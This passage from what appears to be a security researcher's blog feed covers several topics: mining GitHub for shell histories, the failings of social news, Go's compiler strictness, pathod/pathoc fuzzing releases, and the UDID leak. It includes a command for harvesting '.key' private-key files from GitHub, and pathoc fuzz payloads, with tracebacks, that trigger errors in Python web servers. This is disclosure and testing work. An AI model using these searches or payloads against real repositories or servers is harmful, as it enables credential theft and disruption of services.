straight from this image.</p> Starting at the top, the first thing we notice is how widely used the ps \| grep</strong> chain is. About 17% of users in my sample used this chain - given the type of data we have, the real-world prevalence would surely be higher still. I've just been extolling the virtues of small tools and composability, but in this case practicality should beat purity. I suggest that everyone should have a command-alias similar to this in their shell configuration:</p> alias </span>pg</span>="</span>ps aux \| grep</span>" </span></code></pre> I've added this to my .zshrc today, and I've already used it twice.</p> Next up, we have the ls \| grep</strong> pipes. The vast majority of uses here could actually be accomplished using the shell's filename generation mechanism. This ranges from simple redundancies like grepping for file extensions, to performing quite complex matching operations that could be done using the shell's advanced glob operations. I'm guilty of this myself - I rarely use features like recursive globbing, expansions using character ranges, case insensitive globbing, and so forth. I've brushed up on filename expansion for my chosen shell</a>, and perhaps you should too.</p> The last thing I want to point out is a pattern that's genuinely dangerous - curl \| bash</strong>, along with its cousins curl \| sh</strong> and wget \| sh</strong>. Unfortunately, this has become the recommended installation pattern for some tool - the vast majority of invocations here are for RVM</a> and Yeoman</a>. I don't think it's a good idea to pipe anything from the web straight into a local shell, but the situation is made particularly dire by the fact that almost half of these invocations are either over plain HTTP or explicitly turn certificate validation off.</p> I'll stop here, although there are interesting things to say about nearly every entry in the graph above. Next week, I'll move on from the shell history sample, look at some other juicy datasets extracted using ghrabber.</p> Things I found on GitHub: shell history 2013-02-19T00:00:00+00:00 Github recently introduced hugely improved code search</a>, one of those rare moments when a service I use adds a feature that directly and measurably measurably improves my life. Predictably, there was soon a flurry</a> of</a> breathless</a> stories about the security implications. This shouldn't have been news to anyone - by now, it should be clear that better search in almost any context has security or privacy implications, a law of the universe almost as solid as the second law of thermodynamics. We saw this with Google's own code search</a>, as well as Google proper</a>, Facebook's Graph Search</a> and even Bing</a>. A certain fraction of people will always make mistakes, and and any sufficiently powerful search will allow bad guys to find and take advantage of the outliers.</p> After the dust had settled a bit I started wondering what else we could do with Github's search - other than snookering schmucks who checked in their private keys. I'm always enticed by data, and the combination of search and the ability to download raw checked-in files seemed like a promising avenue to explore. Lets see what we can come up with.</p> ghrabber</a> - grab files from GitHub</h2> First, some tooling. I've just released ghrabber, a simple tool that lets you grab all files matching a search specification from GitHub. Here, for instance, is an obvious wheeze - fetching all files with the extension ".key":</p> ./ghrabber.py </span>"</span>extension:key</span>" </span></code></pre> Downloaded files are saved locally to files named user.repository</strong>. Existing files with the same name are skipped, which means that you can reasonably efficiently stop and resume a ghrab.</p> Shell history files</h2> I've been having a lot of fun exploring Github with ghrabber. I'll return to this in future posts - today I'll start with a quick illustration of what can be done. One type of difficult-to-find information that is sometimes checked in to repos is shell history. Two simple ghrabber commands for the two most popular shells is all we need:</p> ./ghrabber.py </span>"</span>path:.bash_history</span>" </span></code></pre> and</p> ./ghrabber.py </span>"</span>path:.zsh_history</span>" </span></code></pre> After cleaning the data a bit, I had 234 history files varying in length from 1 line to just over 10 thousand, containing a total of 165k entries. I fed this into Pandas</a> for analysis, parsing each command using a combination of hand-hacked heuristics and the built-in shlex</a> module. The remainder of this post is a light exploration of some approaches to this dataset, steering clear of the obvious and tediously well-covered security implications.</p> </a> </div> One way to slice the data is to look at the percentage of history files a given command appears in. This gives us a nice listing of the top commands by user prevalence, which you can see in the graph on the left above. On the right, I've taken the same list of commands, and checked how many invocations are preceded by a man</strong> lookup for the command. This gives us an idea of which commonly-used commands have difficult or unintuitive interfaces. It's interesting that ln</strong> is right at the top of the list, considering how simple the command syntax is. My theory is that everyone forgets the order of the source and target files.</p> </a> </div> </a> </div> Since we have a list of the most widely used commands, it's also trivial to do silly popularity comparisons. Above is the obvious look at the state of the editor wars (vim is winning, folks), and a check on how tmux</a> is doing in supplanting screen (the faster the better).</p> </a> </div> </a> </div> </a> </div> </a> </div> Another interesting thing to do is to look at the most commonly used flags to commands. I think having "real data" of command use may well guide us to design better command-line interfaces. I'd love to know the most common invocation flags for some of the tools I write.</p> I'll stop there. The data pool in this case is very deep, and there are a huge range of interesting bits of command-line ethnography that could be done. Stay posted for more in the coming weeks.</p> The trouble with social news 2013-01-24T00:00:00+00:00 There is something terribly awry with the social news ecosystem. This is a feeling that's been growing on me over the last few years, and is the reason why I've cut both Reddit</a> and Hacker News</a> (who together constitute pretty much all of "social news") out of my information diet. Although I've mulled over things in various conversations, I've never actually tried to put my feeling of unease in writing, until today. What's spurring me into action is a proposal by Yann LeCun</a> that a model similar to social news be adopted for scientific peer review - self-assembled Reviewing Entities voting on streams of submitted papers, regulated by a reputation system for authors and reviewers. Basically, this is science a la Reddit: complete with subreddits, karma and upboats. I find the idea frankly terrifying.</p> I guess it's time, then, to put finger to keyboard and lay out what disquiets me about social news.</p> Karma Corrupts</h2> You start by introducing a reputation mechanism like karma</a> to improve some outcome - say, to increase the quality of comments, or to apply a threshold to restrict voting to trustworthy community members. This seems like a plausible and even elegant mechanism at first, until you discover the terrible side-effects.</p> Humans are fundamentally status-seeking social apes, and you've now introduced a visible measure of social worth that people will be driven to maximize. In the real world, we have a word for those who spend their lives accumulating karma - we call them politicians. And so, within karma communities, we see the rise of a political class - persuasive centrists who cater (perhaps unconsciously) to a constituency, and who express (perhaps eloquently) opinions calculated to appeal to the masses and avoid controversy. Hacker News and many subreddits are dominated by people like this, whose comments are largely predictable and rarely add anything new or unexpected to the conversation.</p> At the bottom end of the food chain, we have a different class of creature with the same basic aim as the politicians, but without the persuasive charm needed to pull off the political approach. These are the karma whores, who use a mixture of frank pandering, provocation and calculated outrage to achieve the same aims.</p> The karma maximization game often acts contrary to the goals we aimed to achieve by introducing karma in the first place: the tenor of the community suffers, the diversity of opinion declines, and the karma whores post pictures of their cats everywhere.</p> The Lossy Sieve</h2> Go and have a look at the new story submission queue</a> on Hacker News. Scroll through a few pages, and pay attention to the stories stuck at one vote - they will most likely never receive another upvote and will die in obscurity. Now, go look at the front page</a>. When I do this exercise I'm struck by the fact that there's plenty of crap on the front page, and quite a bit of good stuff in the submission queue languishing in obscurity. So, quality can't be the sole metric here - what determines what gets onto the front page and what doesn't?</p> Lets try a thought experiment. First, set up a small number of voting accounts - say, 10 or so. Now, in the new submission queue, pick 5 random stories every hour, and give them a small number of upvotes soon after they are submitted. I predict that you will find that stories that received this small initial boost are vastly more likely to end up on the front page. If I'm right, then chance dominates story selection - as long as an article exceeds some basic quality threshold, it all depends on who happens to see the story soon after it is submitted, and whether the spirit moves them to vote. Note that this is not the case at the extremes - frankly bad content won't be upvoted, and really important stories will usually find their way to the top. The lossy sieve phenomenon affects everything in between.</p> What this boils down to is that social news doesn't provide an effective filter - good content gets lost, and mediocre content finds its way onto our screens.</p> The Pinhole Effect</h2> In social news, the front page is king. Most users never go beyond the first or second page of top stories. However, front-page real estate is incredibly limited compared to the volume of submissions on most popular subreddits and on Hacker News. The effect of this is that we're looking at a fast-flowing river of information through a pinhole. Even assuming that the selection mechanism works flawlessly, what you see on the front page is a small sliver of the total, chosen through a consensus mechanism that takes no account of individual variation in tastes and interests. The news you see is not tailored to you</em> - it's tailored to some abstract, average participant, with all the rough edges of individuality smoothed away. The effect of this is that even at its best, the stories that emerge from the social news system feel like a predictable pablum dished up by the hivemind. The subreddit system tries to improve this by allowing communities to self-assemble around interests, but the pinhole effect still dominates in busy subreddits like /r/programming</a>.</p> Gaming The System</h2> Social news systems are eminently gameable, and cheating is rife. Part of the reason for this is that a story's destiny depends on a relatively small number of votes. If your story has any merit at all, you significantly increase the likelihood that it will end up on the front page by giving it a small nudge at the beginning of its life. If it has no merit whatsoever, you can still force it onto people's screens with a few tens or hundreds of votes. Conversely, you can use the same effect to censor and oppress views you disagree with if your social news site has downvotes. Anyone who's kept an eye on these things can rattle off examples of gaming in action: the voting rings</a>, the "social media consultants"</a>, the vigilante thought-polizei</a>, the political operators</a>, and dozens of other types of manipulation and villainy. What's more - these visible scandals are just the tip of the iceberg. Eyeballs are valuable, and there's an active arms race with social news sites on the one side, and a dark army of spammers, scammers and true believers on the other. How much of what we see is affected by this type of cheating? We just don't know, but my suspicion is that the effect is significant.</p> The point here is broader than any particular instance of gaming. It's that social news sites are structurally susceptible to manipulation in ways that can't be fixed without changing the core of their operation. A system like this might be good enough to deliver rage comics</a>, but I feel queasy trusting it any further.</p> Community Collapse Disorder</h2> My final beef with social news is a problem that it shares with pretty much all online communities, especially technical ones. We're all familiar with the life-cycle of technical forums. They start with a small community of insiders who create value, which then attracts more people to participate, which then dilutes the quality of the contributions (and often introduces a few pathological bad actors), which then causes the good contributors to move on, which causes the magic well to dry up. Everyone then take their toys and move to the next community, and the cycle repeats. We saw this with Usenet and the original C2 wiki, and we are seeing it now with Hacker News and many technical subreddits all at various points in this life-cycle.</p> I believe that Community Collapse Disorder is one of the Big Problems online that we don't yet have a satisfactory solution to. People are trying, though. Hacker News, for instance, seems to be rather poignantly aware of its own decline</a>, with some of the best of the old-timers calling for an alternative</a>. Paul Graham himself recognizes the issue, and has been tweaking things in various ways to combat the phenomenon, without much success.</p> At the moment, we just don't know how to build online communities that are both inclusive and stable. Democracy, here, seems to lead inevitably to decline, and social news sites are no exception.</p> A better way forward?</h2> A big part of the reason I don't use social news anymore is that my existing social networks have become so much more effective at turning up good content. The absolute best source of news for me is simply the set of links shared by the folks I follow on Twitter</a>. I follow people who post interesting content, and whom I trust to act as information filters for me. Most of them share my technical interests, but some are interesting because they are from my home town, or because they share some more esoteric pursuit with me. So, the news stream I see is exactly tailored to me. At the same time, there is also room idiosyncrasy - if someone I follow shares something left-field that tickles their fancy, I'll see it. In turn, I try to be a responsible information filter for those who follow me - I find a link or two worth tweeting on most days.</p> There are still things I miss - Twitter is great for sharing links, but is an awful medium for technical discussion. Google+</a> could be a better alternative, but just doesn't seem to have achieved liftoff for me. I would also love better tools for aggregating and harvesting links from my social network. At the moment I use Flipboard</a> and Prismatic</a>, but I have issues with both. On the whole, though, these are quibbles. It seems to me that using social networks to filter news is a better way forward - if I was tackling the social news problem, I'd be building tools to support this process.</p> Go: a nice language with an annoying personality 2013-01-18T00:00:00+00:00 Last week, I had the pleasure of attending Dropbox</a>'s annual company hack fest</a>. It was a great opportunity to get a look at how Dropbox works internally, and mingle with the smart and driven folks who make one of my favourite products. In the spirit of hack week, me and my friend @alexdong</a> decided to do our project in Go. We'd both wanted to explore the language, but had never quite been able to make time - a week-long code holiday seemed to be the perfect opportunity. I was hopeful that Go would turn out to hit a magical sweet spot: a light set of abstractions hugging close to the machine, while still providing the indoor plumbing and civilized conveniences of life that I had grown used to with languages like Python. Five days of furious hacking later, I can report that Go might well deliver on this promise, but has enough annoying personality quirks that I will think twice about basing any more projects on it.</p> My main beef with Go has nothing to do with fundamental language design, and may seem almost inconsequential at first glance. The Go compiler treats unused module imports and declared variables as compile errors. This is great in theory and is something you might well want to enforce before code can be committed, but during the actual process</em> of producing code it's nothing but an irksome, unnecessary pain in the ass. Let's look at a concrete example, starting with a snippet of code as follows 1</a></sup></p> import </span>( "</span>io/ioutil</span>" ) ... ... </span>m</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>) </span>if </span>err </span>!= </span>nil </span>{ </span>return </span>nil</span>, </span>err </span>} ... ... </span>DoSomething</span>(</span>m</span>) </span></code></pre> I'm a firm believer that printing stuff to screen is a programmer's best debugging tool, so say we're hacking away and want to print the value of m</strong> while running our unit tests. We change the code as follows, adding an import for the "fmt" module and a call to Print:</p> import </span>( "</span>io/ioutil</span>" "</span>fmt</span>" ) ... ... </span>m</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>) </span>if </span>err </span>!= </span>nil </span>{ </span>return </span>nil</span>, </span>err </span>} </span>fmt</span>.</span>Print</span>(</span>m</span>) ... ... </span>DoSomething</span>(</span>m</span>) </span></code></pre> Now we keep hacking, and want to comment out the print statement for a moment like so:</p> import </span>( "</span>io/ioutil</span>" "</span>fmt</span>" ) ... ... </span>m</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>) </span>if </span>err </span>!= </span>nil </span>{ </span>return </span>nil</span>, </span>err </span>} </span>//fmt.Print(m) </span>... ... </span>DoSomething</span>(</span>m</span>) </span></code></pre> This is a compile error. We have to switch contexts, move to the top of the module, also comment out the import, and then move back to the spot we're really hacking on:</p> import </span>( "</span>io/ioutil</span>" </span>//"fmt" </span>) ... ... </span>m</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>) </span>if </span>err </span>!= </span>nil </span>{ </span>return </span>nil</span>, </span>err </span>} </span>//fmt.Print(m) </span>... ... </span>DoSomething</span>(</span>m</span>) </span></code></pre> A few seconds later, we want to re-enable the Print statement - so up we go again to the top of the module to re-enable the import. This is even worse when we want to, say, comment out the DoSomething</strong> call while hacking:</p> import </span>( "</span>io/ioutil</span>" ) ... ... </span>m</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>) </span>if </span>err </span>!= </span>nil </span>{ </span>return </span>nil</span>, </span>err </span>} ... ... </span>//DoSomething(m) </span></code></pre> This is also a compile error because now m</em> is unused. We have to hunt up in our code to find the declaration, which could be explicit or implicit using an :=</strong> assignment. So, in this case we find the declaration, and use the magic underscore name to throw the offending value away:</p> import </span>( "</span>io/ioutil</span>" ) ... ... </span>_</span>, </span>err </span>:= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>) </span>if </span>err </span>!= </span>nil </span>{ </span>return </span>nil</span>, </span>err </span>} ... ... </span>//DoSomething(m) </span></code></pre> That should fix it, right? Well, no. It turns out we've previously declared and used err</strong> (a very common idiom), so this is still a compile error. We're using the "declare and assign" syntax, but have no new variables on the left-hand side of the ":=". So we need to make another tweak:</p> import </span>( "</span>io/ioutil</span>" ) ... ... </span>_</span>, </span>err </span>= </span>ioutil</span>.</span>ReadFile</span>(</span>path</span>) </span>if </span>err </span>!= </span>nil </span>{ </span>return </span>nil</span>, </span>err </span>} ... ... </span>//DoSomething(m) </span></code></pre> Five seconds later, we want to re-enable DoSomething</strong>, and now we have to unwind the entire process.</p> The cumulative effect of all this is like trying to write code while someone next to you randomly knocks your hands off the keyboard every few seconds. It's a pointlessly pedantic approach that adds constant friction to your write-compile-test cycle, breaks your flow, and just generally makes life a little harder for very little benefit. There's no way to turn this mis-feature off, no flag we can pass to the compiler to temporarily make this a warning rather than an error while hacking2</a></sup>.</p> The irony of the situation is that I agree with the sentiment behind this. I don't want dangling variables or imports in my codebase. And I agree that if something is worth warning about it's worth making it an error. The mistake is to confuse the state we want at the conclusion of a unit of hacking3</a></sup>, with what we need at every point in between, during the write-compile-test cycle. This cycle is the core of the process of actually producing code, and the exhilarating sense of weightlessness</a> that you get when hacking in Python is largely due to the fact that the language works really, really hard to optimize this process. Go has given away this feeling of exhilaration, basically for nothing.</p> Despite all this, it's still possible that the benefits of Go do outweigh its irritating personality. Interfaces, memory management, first-class concurrency and static type checking is a knockout combination, and the language in general has something of the taut practicality that I love in C. So, despite the rantiness of this post, I'll keep hacking on our project and make sure I produce a few thousand more lines of code before making a final call on the language. Look for a project release and a blog post along these lines in the coming months.</p> ^{1</sup> Ellipses indicate "an arbitrary amount of intervening code"</p> </div> ^{2</sup> I edited this paragraph a bit for tone. I originally accused the Go documentation of being faintly smug about all of this - which is not fair, and doesn't add anything to the argument.</p> </div> ^{3</sup> Why don't we have a word for this? By "unit of hacking", I mean the work that goes on between starting to hack on a change-set and doing a commit. At the beginning and at the end, the code is in a clean state, but in between there are many periods of transition where cleanliness requirements are relaxed.</p> </div>}}} Released: pathod 0.3 2012-11-16T00:00:00+00:00 I've just released pathod 0.3</a>, which beefs up pathoc</a>'s fuzzing capabilities, improves the spec language and includes lots of bugfixes and other small tweaks. Get it while it's hot!</p> Better fuzzing</h2> A major focus of this release is to improve pathoc</a>'s capabilities as a basic fuzzing tool. I've had fun breaking webservers</a> with pathoc, and it's even come in handy in my Day Job. Here's a quick summary of how things have changed.</p> The -x</strong> flag tells pathoc to explain its requests. This prints out an expanded pathoc query specification, with all randomly generated content and query modifications resolved. If you trigger an exception, you can precisely replay the offending query using this explanation.</li> The options for outputting requests and responses have been expanded hugely. First, the -q</strong> and -r</strong> flags tell pathoc to dump complete records of requests and responses respectively. This data is sniffed by instrumenting the socket, so is canonical regardless of our ability to interpret returned data. The -x</strong> option makes pathod dump this data in hexdump format (otherwise unprintable characters are escaped to preserve your terminal).</li> A number of options have been added to let you ignore expected responses. -C</strong> takes a comma-separated list of response codes to ignore. -T</strong> ignores server timeouts. This lets you hone in on the exceptional responses that you care about, and ignore the rest.</li> </ul> Language improvements</h2> I've simplified response specifications by making the response message a standard component with the "r" mnemonic.</li> I've added the "u" mnemonic to request specifications, as a shortcut for specifying the User-Agent header:</li> </ul> get:/:u"My Weird User-Agent" </span></code></pre> We also have a small library of representative User-Agent strings that can be used instead of specifying your own. For example, this specifies the GoogleBot User-Agent string:</p> get:/:ug </span></code></pre> The list of available shortcuts are in the docs, and can be listed from the commandline using the --show-uas</strong> flag to pathoc:</p> > ./pathoc --show-uas User agent strings: a android l blackberry b bingbot c chrome f firefox g googlebot i ie9 p ipad h iphone s safari</pre> </span></code></pre> pathoc: break all the Python webservers! 2012-09-27T00:00:00+00:00 A few months ago, I announced pathod</a>, a pathological HTTP daemon. The project started as a testing tool to let me craft standards-violating HTTP responses while working on mitmproxy</a>. It soon became a free-standing project, and has turned out to be incredibly useful in security testing, exploit delivery and general creative mischief. In the last release, I added pathoc - pathod's malicious client-side twin. It does for HTTP requests what pathod does for HTTP responses, and uses the same hyper-terse specification language</a>.</p> In this post, I show how pathoc can be used as a very simple fuzzer, by finding issues in a number of major pure-Python webservers. None of the tested servers failed catastrophically - they all caught the unexpected exception and continued serving requests. None the less, I think it's reasonable to say that we've triggered a bug if a) the server returns an 500 Internal Server Error response or terminates the connection abnormally, and b) we see a traceback in our logs. In fact, by this definition, I found bugs in every</em> pure-Python server I tested.</p> All of the problems I list below are simple failures of validation - what they have in common is that somewhere in the project code is called with input that it doesn't expect and can't handle. This matters - in fact, I'd argue that the majority of security problems fall in this category. It's interesting to ponder why this type of issue is so ubiquitous in Python servers. I have no doubt that part the answer lies in Python's use of exceptions - errors that would be explicit in other languages can be implicit in Python, and code that seems clean and intuitive might in fact be buggy. I think this is especially relevant right now, given the recent flurry of discussion surrounding the Go language</a> and its error handling. It's pretty instructive to read Russ Cox's recent riposte</a> to this post</a> criticizing Go's explicit approach, while looking at the bugs below. I love Python</a> and I think it's a fine language, but I also think the designers of Go probably made the right choice.</p> Basic fuzzing with pathoc</h2> My methodology for these tests was very simple indeed. I launched each server in turn, and used pathod to fire corrupted GET requests at the daemon until I saw an error. I then looked at the logs, and boiled the distinct cases down to a minimal pathoc specification by hand. This exercises a rather shallow set of features in the server software - mostly parsing of the HTTP lead-in and request headers. It's possible to give software a much, much deeper workout with pathoc, but I'll leave that for a future post.</p> My pathoc fuzzing command looked something like this:</p> pathoc -n</span> 1000</span> -p</span> 8080</span> -t</span> 1 localhost '</span>get:/:b@10:ir,"\x00"</span>' </span></code></pre> The most important flags here are -n</b>, which tells pathoc to make 1000 consecutive requests, and -t</b>, which tells pathoc to time out after one second (necessary to prevent hangs when daemons terminate improperly). The request specification itself breaks down as follows:</p> get</td> Issue a GET request</td> </tr> /</td> ... to the path / </td> </tr> b@10</td> ... with a body consisting of 10 random bytes </td> </tr> ir,"\x00"</td> ... and inject a NULL byte at a random location.</td> </tr> </table> It's that last clause - the random injection - that makes the difference between simply crafting requests and basic fuzzing. Every time a new request is issued, the injection occurs at a different location. I varied the injected character between a NULL byte, a carriage return and a random alphabet letter. Each exposed different errors in different servers. For a complete description of the specification language, see the online docs</a>.</p> Results</h2> For each bug, I've given a traceback and a minimal pathoc call to trigger the issue. The tracebacks have been edited lightly to shorten file paths and remove irrelevances like timestamps.</p> CherryPy</h3> pathoc -p</span> 8080 localhost '</span>get:/:b@10:h"Content-Length"="x"</span>' </span></code></pre>ENGINE ValueError("invalid literal for int() with base 10: 'x'",) Traceback (most recent call last): File "cherrypy/wsgiserver/wsgiserver2.py", line 1292, in communicate req.parse_request() File "cherrypy/wsgiserver/wsgiserver2.py", line 591, in parse_request success = self.read_request_headers() File "cherrypy/wsgiserver/wsgiserver2.py", line 711, in read_request_headers if mrbs and int(self.inheaders.get("Content-Length", 0)) > mrbs: ValueError: invalid literal for int() with base 10: 'x' </span></code></pre>pathoc -p</span> 8080 localhost '</span>get:/:i4,"\r" </span></code></pre>ENGINE TypeError("argument of type 'NoneType' is not iterable",) Traceback (most recent call last): File "cherrypy/wsgiserver/wsgiserver2.py", line 1292, in communicate req.parse_request() File "cherrypy/wsgiserver/wsgiserver2.py", line 580, in parse_request success = self.read_request_line() File "cherrypy/wsgiserver/wsgiserver2.py", line 644, in read_request_line if NUMBER_SIGN in path: TypeError: argument of type 'NoneType' is not iterable </span></code></pre>Tornado</h3> pathoc -p</span> 8080 localhost '</span>get:/:b@10:h"Content-Length"="x"</span>' </span></code></pre>[E 120927 11:42:26 iostream:307] Uncaught exception, closing connection. Traceback (most recent call last): File "tornado/iostream.py", line 304, in wrapper callback(args) File "tornado/httpserver.py", line 254, in _on_headers content_length = int(content_length) ValueError: invalid literal for int() with base 10: 'x' [E 120927 11:42:26 ioloop:435] Exception in callback <tornado.stack_context._StackContextWrapper object at 0x1012e28e8> Traceback (most recent call last): File "tornado/ioloop.py", line 421, in _run_callback callback() File "tornado/iostream.py", line 304, in wrapper callback(args) File "tornado/httpserver.py", line 254, in _on_headers content_length = int(content_length) ValueError: invalid literal for int() with base 10: 'x' </span></code></pre>pathoc -p</span> 8080 localhost '</span>get:/:h"h\r\n"="x"</span>' </span></code></pre>[E iostream:307] Uncaught exception, closing connection. Traceback (most recent call last): File "tornado/iostream.py", line 304, in wrapper callback(args) File "tornado/httpserver.py", line 236, in _on_headers headers = httputil.HTTPHeaders.parse(data[eol:]) File "tornado/httputil.py", line 127, in parse h.parse_line(line) File "tornado/httputil.py", line 113, in parse_line name, value = line.split(":", 1) ValueError: need more than 1 value to unpack [E ioloop:435] Exception in callback <tornado.stack_context._StackContextWrapper object at 0x1012bd7e0> Traceback (most recent call last): File "tornado/ioloop.py", line 421, in _run_callback callback() File "tornado/iostream.py", line 304, in wrapper callback(args) File "tornado/httpserver.py", line 236, in _on_headers headers = httputil.HTTPHeaders.parse(data[eol:]) File "tornado/httputil.py", line 127, in parse h.parse_line(line) File "tornado/httputil.py", line 113, in parse_line name, value = line.split(":", 1) ValueError: need more than 1 value to unpack </span></code></pre>Twisted</h2> pathoc -p</span> 8080 localhost '</span>get:/:b@10:h"Content-Length"="x"</span>' </span></code></pre>[HTTPChannel,4,127.0.0.1] Unhandled Error Traceback (most recent call last): File "twisted/python/log.py", line 84, in callWithLogger return callWithContext({"system": lp}, func, args, kw) File "twisted/python/log.py", line 69, in callWithContext return context.call({ILogContext: newCtx}, func, args, *kw) File "twisted/python/context.py", line 118, in callWithContext return self.currentContext().callWithContext(ctx, func, args, *kw) File "twisted/python/context.py", line 81, in callWithContext return func(args,**kw) --- <exception caught here> --- File "twisted/internet/selectreactor.py", line 150, in _doReadOrWrite why = getattr(selectable, method)() File "twisted/internet/tcp.py", line 199, in doRead rval = self.protocol.dataReceived(data) File "twisted/protocols/basic.py", line 564, in dataReceived why = self.lineReceived(line) File "twisted/web/http.py", line 1558, in lineReceived self.headerReceived(self.__header) File "twisted/web/http.py", line 1580, in headerReceived self.length = int(data) exceptions.ValueError: invalid literal for int() with base 10: 'x' </span></code></pre>SimpleHTTP</h2> pathoc -p</span> 8080 localhost '</span>get:"/\0"</span>' </span></code></pre>Exception happened during processing of request from ('127.0.0.1', 54029) Traceback (most recent call last): File "lib/python2.7/SocketServer.py", line 284, in _handle_request_noblock self.process_request(request, client_address) File "lib/python2.7/SocketServer.py", line 310, in process_request self.finish_request(request, client_address) File "lib/python2.7/SocketServer.py", line 323, in finish_request self.RequestHandlerClass(request, client_address, self) File "lib/python2.7/SocketServer.py", line 638, in __init__ self.handle() File "python2.7/BaseHTTPServer.py", line 340, in handle self.handle_one_request() File "lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request method() File "lib/python2.7/SimpleHTTPServer.py", line 44, in do_GET f = self.send_head() File "lib/python2.7/SimpleHTTPServer.py", line 68, in send_head if os.path.isdir(path): File "lib/python2.7/genericpath.py", line 41, in isdir st = os.stat(s) TypeError: must be encoded string without NULL bytes, not str </span></code></pre>Waitress</h3> pathoc -p</span> 8080 localhost '</span>get:/:i16," "</span>' </span></code></pre>ERROR:waitress:uncaptured python exception, closing channel <waitress.channel.HTTPChannel connected 127.0.0.1:62330 at 0x1007ca310> ( <type 'exceptions.IndexError'>:list index out of range [lib/python2.7/asyncore.py\|read\|83] [lib/python2.7/asyncore.py\|handle_read_event\|444] [lib/python2.7/site-packages/waitress/channel.py\|handle_read\|169] [lib/python2.7/site-packages/waitress/channel.py\|received\|186] [lib/python2.7/site-packages/waitress/parser.py\|received\|99] [lib/python2.7/site-packages/waitress/parser.py\|parse_header\|158] [lib/python2.7/site-packages/waitress/parser.py\|get_header_lines\|247] ) </span></code></pre> Edit: The first version of this post had examples that were due to the test WSGI application, not waitress. I've replaced them with the traceback above, which has been reformatted for clarity.</strong></p> Werkzeug</h3> pathoc -p</span> 8080 localhost '</span>get:/:h"Host"="n\r\0"</span>' </span></code></pre>Traceback (most recent call last): File "flask/app.py", line 1518, in __call__ return self.wsgi_app(environ, start_response) File "flask/app.py", line 1507, in wsgi_app return response(environ, start_response) File "/usr/local/lib/python2.7/site-packages/werkzeug/wrappers.py", line 1082, in __call__ app_iter, status, headers = self.get_wsgi_response(environ) File "werkzeug/wrappers.py", line 1070, in get_wsgi_response headers = self.get_wsgi_headers(environ) File "werkzeug/wrappers.py", line 986, in get_wsgi_headers headers['Location'] = location File "werkzeug/datastructures.py", line 1132, in __setitem__ self.set(key, value) File "werkzeug/datastructures.py", line 1097, in set self._validate_value(_value) File "werkzeug/datastructures.py", line 1065, in _validate_value raise ValueError('Detected newline in header value. This is ' ValueError: Detected newline in header value. This is a potential security problem </span></code></pre> Limits of data visualization with space filling curves 2012-09-20T00:00:00+00:00 I recently wrote a series</a> of posts</a> using the Hilbert curve</a> to visualize binaries, culminating in a gallery showing regions of high entropy in malware</a>.</p> </a> </div> The fact that the Hilbert curve has excellent locality preservation means that one dimensional features are preserved (as much as they can be) in the two-dimensional layout. This lets us visually pick out features of interest, and makes it possible, for instance, to quickly identify different malware packers just based on their layout characteristics.</p> An obvious next step is to ask if it's possible to extend this idea to let us visually compare binaries, creating a sort of visual diff. Unfortunately, we now bump our heads against the limitations of space-filling curve visualization. I made the animation below after a recent conversation along these lines, and I think it illustrates the main issues nicely. It shows a single contiguous stretch of data (the black area) being shifted progressively through a binary. At each timestep, the only thing that changes is the starting location of the data block:</p> </a> </div> Two things are immediately clear:</p> The block of data doesn't retain its shape at different offsets - identical stretches of data can look totally different depending on their locations.</li> There's no way to quickly see where</em> in the binary a piece of information lies. Unless you are very familiar with the particular curve and know its exact orientation, you can't say, for instance, when the data block lies a third of the way through the binary.</li> </ul> It's often worthwhile to trade off these things for locality preservation, but it definitely scotches certain use cases. I do wonder if it might be possible to tune the trade-off somewhat - sacrificing some locality preservation for better shape retention and offset estimation. I've toyed with some ideas along these lines (see the unrolled layouts in the binary visualization post</a>), but I still don't have a satisfying solution. If anyone out there knows of one, drop me a line.</p> Findng the UDID leak: a guessing game 2012-09-07T00:00:00+00:00 It's become quite a popular parlor game to guess who is responsible for the recent Antisec UDID leak. I've now seen no less than six separate apps named as the probable source (two of which came from Marco Arment</a>). Before we pick the next culprit, I think it's worth taking a step back to consider the list of things we don't</em> know:</p> We don't know that we're dealing with just one source. The Antisec dump may well be an amalgam of data from various sources.</li> We don't know that we're looking for just one app, or even a set of apps by one developer. The leak may well come from one of the myriad of 3rd party services which could be included in thousands of apps.</li> We don't know that Antisec is being truthful about the scale of the database, or the additional data they claim is associated with the UDID/APNS records.</li> We certainly don't know that the data was filched from an FBI laptop or that the NCFTA was in any way involved.</li> </ul> Given all of these unknowns, I think a simple process-of-elimination approach to tracking down the leak will probably be fruitless, or worse, result in the finger being pointed at even more innocent parties. The one entity that may already have the answer to this question is Apple. They have a list of a million affected UDIDs, and they presumably have records of all apps that have ever used the associated push tokens. Given a large and precise sample like this, it should be possible to find the origin(s) of the leak reasonably easily. Indeed, if Apple is on the ball they may already have done this.</p> Now for some frank speculation of my own. Let's assume for a moment that Antisec has been entirely truthful about the data, and that we're dealing with a single source. In that case, we're looking for:</p> ... an app or third-party service integrated into multiple apps</li> ... with 12 million or more users</li> ... that is APNS-enabled</li> ... which also gathers user data like real names and zip codes.</li> </ul> I'll throw my hat in the ring and say that my money is on a third-party service, not a single app. If my hunch is right, the list of possible culprits is actually rather short.</p> The UDID leak is a privacy catastrophe 2012-09-04T00:00:00+00:00 Something I've been worrying about for a long time has just happened: Antisec has leaked a database with more than a million UDIDs</a>. The UDID issue has been a bit of a white whale of mine - I've written many blog posts about it and spent more hours than I care to think negotiating responsible disclosure with companies misusing UDIDs. Let's recap some of the posts I've written about this:</p> In May 2011</a>, just before its sale to Gree was announced, I showed that OpenFeint</a> was misusing UDIDs in a way that allowed you to link a UDID to a user's identity, geolocation and Facebook and Twitter accounts. I didn't discuss it openly at the time, you could also completely take over an OpenFeint account, and access chat, forums, friends lists, and more using just a UDID. This resulted in a class-action lawsuit against OpenFeint, which has since petered out.</li> Later that month</a>, I published a survey looking at how UDIDs are used in practice. The data is now slightly out of date, but shows just how widely UDIDs are used and misused.</li> In September 2011</a>, I published the most troubling news so far, which paradoxically also got the least coverage in the press. I looked at all</em> the gaming social networks on IOS - basically OpenFeint and its competitors - and found catastrophic mismanagement by nearly everyone. The vulnerabilities ranged from de-anonymization, to takeover of the user's gaming social 